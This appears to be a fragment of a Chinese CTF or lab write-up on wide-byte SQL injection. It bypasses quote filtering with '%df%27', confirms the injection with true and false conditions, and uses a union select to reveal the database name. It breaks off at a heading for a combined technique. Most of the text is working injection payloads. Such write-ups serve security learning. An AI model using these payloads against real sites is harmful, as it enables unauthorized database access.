0X01发现又是‘’被过滤了
?id=1%df%27%20and%201=2%23 错误
?id=1%df%27%20and%201=1%23 正确
存在注入
0X01爆数据库
?id=-1%df%27%20union%20select%201,database(),3%23
0x02组合拳打法